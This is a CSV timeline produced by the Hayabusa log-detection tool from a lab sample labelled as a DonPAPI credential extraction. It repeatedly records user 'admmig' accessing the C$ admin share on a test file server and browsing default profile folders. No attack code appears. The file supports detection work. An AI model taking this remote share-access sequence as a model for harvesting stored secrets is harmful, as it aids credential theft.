0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 
16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx 2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI 
full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
